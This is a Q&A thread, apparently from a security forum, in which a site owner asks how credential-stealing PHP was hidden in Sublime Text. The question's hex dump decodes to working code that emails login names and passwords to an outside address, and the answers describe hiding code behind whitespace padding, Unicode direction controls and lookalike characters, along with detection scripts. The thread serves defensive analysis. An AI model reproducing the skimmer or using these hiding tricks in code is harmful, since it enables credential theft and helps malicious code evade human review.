50

I recently came across a PHP file on a compromised website that had what appeared (in Sublime Text) to be a huge whitespace gap. When I run a diff against the original source file, I can clearly see the malicious code, which is snagging logins and passwords and emailing them to someone.

The malicious code can also be clearly seen using vim.

My assumption is that this is some kind of encoding exploit, but I can't for the life of me figure out how it's being hidden, and I've never seen anything like this before.

Is anyone familiar with this kind of hidden code exploit? Is there a way to make it visible inside Sublime? I realize it may be difficult to say without seeing the file - I am happy to provide said file if need be.

EDIT - Hex dump as requested:

0000000 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
*
00000c0 20 20 20 20 20 20 20 20 20 69 66 28 24 74 68 69
00000d0 73 2d 3e 75 73 65 72 2d 3e 6c 6f 67 69 6e 28 24
00000e0 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70
00000f0 6f 73 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2c
0000100 20 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74 2d
0000110 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64 27
0000120 5d 29 29 7b 24 73 6d 61 69 6c 3d 24 5f 53 45 52
0000130 56 45 52 5b 27 48 54 54 50 5f 48 4f 53 54 27 5d
0000140 2e 24 5f 53 45 52 56 45 52 5b 27 52 45 51 55 45
0000150 53 54 5f 55 52 49 27 5d 2e 22 7c 22 2e 24 74 68
0000160 69 73 2d 3e 72 65 71 75 65 73 74 2d 3e 70 6f 73
0000170 74 5b 27 75 73 65 72 6e 61 6d 65 27 5d 2e 22 7c
0000180 22 2e 24 74 68 69 73 2d 3e 72 65 71 75 65 73 74
0000190 2d 3e 70 6f 73 74 5b 27 70 61 73 73 77 6f 72 64
00001a0 27 5d 3b 6d 61 69 6c 28 22 61 6c 74 2e 65 69 2d
00001b0 36 6f 6b 36 77 36 76 32 40 79 6f 70 6d 61 69 6c
00001c0 2e 63 6f 6d 22 2c 24 5f 53 45 52 56 45 52 5b 27
00001d0 48 54 54 50 5f 48 4f 53 54 27 5d 2c 24 73 6d 61
00001e0 69 6c 2c 22 46 72 6f 6d 3a 20 61 64 6d 69 6e 40
00001f0 66 6c 79 2e 63 6f 6d 5c 72 5c 6e 52 65 70 6c 79
0000200 2d 74 6f 3a 20 61 6c 74 2e 65 69 2d 36 6f 6b 36
0000210 77 36 76 32 40 79 6f 70 6d 61 69 6c 2e 63 6f 6d
0000220 22 29 3b
0000223
10
  • 3
    @forest - I've added the hex dump. Seems this is accomplished by something as simple as... whitespace?! I'm still trying to wrap my head around how adding a bunch of whitespace is causing Sublime to not show the trailing text. It seems like total lunacy - I'm sure there is a setting for this, and also sure that the code author is well aware of this nonsensical behaviour and is using it as an exploit. I'd really like my text editor to not do this. Commented Feb 14, 2023 at 1:55
  • 3
    This is actually a fairly well-known technique. In fact, GCC has recently been modified to detect attacks that exploit how text editors parse Unicode and control characters.
    – forest
    Commented Feb 14, 2023 at 1:57
  • 3
    I discovered that if I turn off indent_subsequent_lines the text becomes visible - however that really makes everything else ugly. I wish there were a setting to keep lines indented but side scroll if the indented column was smaller than X. As is often the case, your question led to understanding and a solution. I'm not even sure this question is on topic here. I'd defer to you and delete it if you think it should go. lmk and thanks! Commented Feb 14, 2023 at 2:03
  • 3
    I think the question is on-topic. It may be useful to someone else, especially if someone answers it with a good, general answer or links it as a duplicate to another question (which improves its visibility).
    – forest
    Commented Feb 14, 2023 at 2:04
  • 3
    This looks more like they are just pushing the visible code off to the right of your screen, but I see nothing in that hex dump that isn't visible ASCII characters (0x21-0x7e) or an ASCII space (0x20). That should be fully visible in Sublime Text with nothing needed besides scrolling to the right spot, at least as far as that hex dump seems to indicate.
    – penguin359
    Commented Feb 15, 2023 at 0:10

3 Answers

62

The code is exploiting a flaw in Sublime to prevent text from being displayed.

This is what part of the code looks like in Notepad++. It is obviously looking for post['username'] and post['password'].

enter image description here

And Notepad++ can handle even 7000 characters when word wrapping:

enter image description here

The flaw is due to Sublime's incorrect word wrap behavior. The 200 leading spaces indent the text far off the screen, and because "word wrap" is enabled the horizontal scrollbar is disabled as well. Sublime isn't actually wrapping any of the text, though, because it treats the 200 spaces as an indent. Zooming out or turning off word wrap would have displayed the text fine.

enter image description here

Sublime has its own HexViewer and that has no problems displaying the code on the ASCII panel:

enter image description here
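Since the hiding relies on nothing more than a long run of ordinary spaces in front of the code, it can be flagged without opening an editor at all. The following is a minimal Python sketch, not part of the original answer: the function name `find_padded_code`, the threshold of 80 whitespace characters, and the sample line are all assumptions chosen for illustration.

```python
import re

# Assumed threshold: a run of 80 or more spaces/tabs followed by visible text
# is treated as suspicious. Tune this to the line lengths of your codebase.
PADDING = re.compile(r"[ \t]{80,}(?=\S)")

def find_padded_code(text, pattern=PADDING):
    """Return (line_number, padding_width, hidden_text) for each suspicious line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = pattern.search(line)
        if match:
            hidden = line[match.end():].strip()
            hits.append((number, len(match.group()), hidden))
    return hits

# Illustrative sample: 201 spaces before the code, as in the hex dump.
sample = "<?php\n" + " " * 201 + "if($this->user->login($u, $p)){ /* ... */ }\n"

for number, width, hidden in find_padded_code(sample):
    print(f"line {number}: {width} whitespace characters before: {hidden}")
```

Running something like this over every file in a deployment would likely produce some false positives (aligned data tables, for example), so the output is best treated as a list of lines to inspect by hand.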

9
  • 6
    What is that flaw? How do a few spaces throw Sublime off?
    – Bergi
    Commented Feb 15, 2023 at 1:29
  • 18
    Who exactly cloaks their exploit against one text editor only?
    – Hobbamok
    Commented Feb 15, 2023 at 15:08
  • 16
    @Hobbamok - Cloaking it against one with a massive market share makes sense... At one point, Sublime was very dominant. If you cloaked it against VSCode today that wouldn't be the worst idea, it would fool a decent number of devs Commented Feb 15, 2023 at 17:56
  • 3
    @Hobbamok - It's hard for me to say but I suspect many editors besides Sublime have similar behaviour or, at the very least, the malicious code stands a reasonable chance of being off screen without a sidescroll. Commented Feb 15, 2023 at 21:35
  • 5
    @EatenbyaGrue Even the basic Notepad.exe in Windows, the one that can't even display UTF-8, handles this correctly. Sublime treats the leading spaces as an explicit indent, maintains the 200 characters, and assumes that because it is in "Word Wrap" mode you don't need the horizontal scrollbar, whereas other editors prioritize text display and simply start wrapping once the text exceeds the window size.
    – Nelson
    Commented Feb 16, 2023 at 0:43
13

This is a very old story:

In short, there are certain Unicode characters that allow code to be hidden from certain text editors. If your text editor doesn't know how to deal with these attacks, I'd highly recommend using something different.
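Whether a file contains such characters can be checked directly. The sketch below assumes the characters of interest are the Unicode bidirectional formatting controls (U+202A to U+202E and U+2066 to U+2069); the function name `find_bidi_controls` is made up for this example. On a file that is pure ASCII, such as the one in the question's hex dump, it would be expected to report nothing.

```python
# Bidirectional formatting controls: embeddings and overrides (U+202A..U+202E)
# plus isolates (U+2066..U+2069). This set is an assumption about what to
# look for, not an exhaustive list of risky characters.
BIDI_CONTROLS = (
    {chr(c) for c in range(0x202A, 0x202F)}
    | {chr(c) for c in range(0x2066, 0x206A)}
)

def find_bidi_controls(text):
    """Return (line_number, column, code_point) for each bidi control found."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                hits.append((line_no, col, f"U+{ord(ch):04X}"))
    return hits

print(find_bidi_controls("a\u202eb\nplain\n"))   # one hit on line 1
print(find_bidi_controls("if ($x) { mail(); }"))  # ASCII only: no hits
```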

6
  • 12
    Those are just the ordinary space character (0x20), no fancy Unicode exploits involved
    – Ben Voigt
    Commented Feb 14, 2023 at 18:20
  • 11
    The characters used in Trojan Source attacks don't appear in the provided hex dump. Commented Feb 14, 2023 at 19:39
  • Thanks to Unicode's brilliant rules involving left-to-right and right-to-left scripts, most "properly working" text editors will show some arrangements of source-text characters in a mixed up sequence that may look like something else.
    – supercat
    Commented Feb 14, 2023 at 22:39
  • 1
    I should correct my last statement. I can certainly find something malicious, but I don't see anything that would magically hide the source code. It should be fully visible with nothing needed besides exercising the horizontal scrollbar heavily.
    – penguin359
    Commented Feb 15, 2023 at 0:15
  • 3
    The Wikipedia article says Trojan Source was discovered on September 9th, 2021. This is far from being very old. Many editors soon adopted a strategy to point malicious code out, so it became a non-issue very fast. Commented Feb 15, 2023 at 10:36
4

There are several Unicode characters that are not visible. The space character, obviously, and the non-breaking space are the ones most commonly used. But there are more, and some may be allowed in programming languages that support Unicode in source code. For example, in Swift it is possible to have a valid variable name that is just invisible (I haven't checked C++, Java, C# and so on, but they may be the same). Worst case, you see a single "=" character, and it is really an assignment from one variable with an invisible name to another.
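One way to surface invisible characters is to look at each character's Unicode general category. The sketch below is an assumption about what counts as "invisible": it reports format characters (category `Cf`, which includes the zero-width space) and any space separator (category `Zs`) other than the plain ASCII space. The function name `find_invisible` is hypothetical.

```python
import unicodedata

def find_invisible(text):
    """Return (index, code_point, name) for characters that render as nothing
    or as a blank, excluding the ordinary ASCII space."""
    hits = []
    for index, ch in enumerate(text):
        category = unicodedata.category(ch)
        if category == "Cf" or (category == "Zs" and ch != " "):
            name = unicodedata.name(ch, "<unnamed>")
            hits.append((index, f"U+{ord(ch):04X}", name))
    return hits

# A no-break space and a zero-width space hidden in a short expression.
for hit in find_invisible("a\u00a0=\u200bb"):
    print(hit)
```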

There are also several pairs of Unicode characters that look exactly the same, for example uppercase A and uppercase Greek alpha. You have the same problem there. That's probably even more dangerous, because you see code that looks valid (it is actually valid) but you don't realise it's dangerous, whereas with invisible variable names you can see that something is obviously dodgy.

Finally, there are Unicode characters that can be formed from Unicode code points in more than one way. For example, there is a single code point "lowercase letter e with diaeresis" (ë), and there is a sequence of two code points, "lowercase letter e" followed by "combining diaeresis", which looks exactly the same. To your programming language they might be the same and to your text editor they might be different, or the other way round.
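Both effects are easy to reproduce. The following Python sketch uses only the standard `unicodedata` module; the variable names are just for illustration.

```python
import unicodedata

# Lookalike pair: visually identical in most fonts, different code points.
latin_a = "A"            # U+0041 LATIN CAPITAL LETTER A
greek_alpha = "\u0391"   # U+0391 GREEK CAPITAL LETTER ALPHA
print(latin_a == greek_alpha)            # False
print(unicodedata.name(greek_alpha))     # GREEK CAPITAL LETTER ALPHA

# Same visible character, two encodings.
composed = "\u00eb"      # single code point: e with diaeresis
decomposed = "e\u0308"   # two code points: e + combining diaeresis
print(composed == decomposed)            # False
print(len(composed), len(decomposed))    # 1 2

# Normalisation maps both spellings onto one form.
print(unicodedata.normalize("NFC", decomposed) == composed)   # True
print(unicodedata.normalize("NFD", composed) == decomposed)   # True
```

Note that normalisation only unifies the two spellings of ë. It does not turn the Greek alpha into a Latin A, so lookalike characters need a separate check.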

In your example you just have plenty of whitespace. With some editors for programming, lots of whitespace might force code to be off your display. Without text wrapping, if your editor shows 100 characters, and I start a line with 100 space characters, the actually interesting code might be outside your window and invisible.

Now the good thing: All these problems are just causing malicious code to pass visual inspection. Most malicious code is never looked at by anyone, so there is only little additional risk added. Most people would never have looked at your php code at all.

Automatic tools that examine code should not be tricked by most of these, even without special measures. The exception is different Unicode code point sequences for the same character. Any such tool should reject invalid UTF-8 and convert Unicode characters that have several representations into one normalised representation as soon as any supposed UTF-8 data comes in, then throw out the original.
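As a rough sketch of that intake step in Python: decode strictly so that invalid UTF-8 is rejected, then normalise. The function name `load_source` and the choice of NFC as the normal form are assumptions; a tool could equally settle on another form as long as it uses one consistently.

```python
import unicodedata

def load_source(raw: bytes) -> str:
    """Decode bytes as strict UTF-8 and return NFC-normalised text.

    Raises UnicodeDecodeError if the input is not valid UTF-8.
    """
    text = raw.decode("utf-8", errors="strict")
    return unicodedata.normalize("NFC", text)

# "e" followed by COMBINING DIAERESIS (bytes CC 88) comes back as one code point.
print(len(load_source(b"e\xcc\x88")))

# Invalid UTF-8 is rejected rather than silently repaired.
try:
    load_source(b"\xff")
except UnicodeDecodeError as err:
    print("rejected:", err.reason)
```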

3
  • 9
    I don't see any characters outside of the printable ASCII range in the hex dump. Commented Feb 14, 2023 at 19:39
  • 1
    C++ doesn't permit invisible names, and I'm pretty sure Java doesn't either.
    – Mark
    Commented Feb 15, 2023 at 2:29
  • Yes, it's quite frightening that Swift does. But as I said, when you look at such code, you see immediately that something "interesting" is going on.
    – gnasher729
    Commented Feb 15, 2023 at 16:37
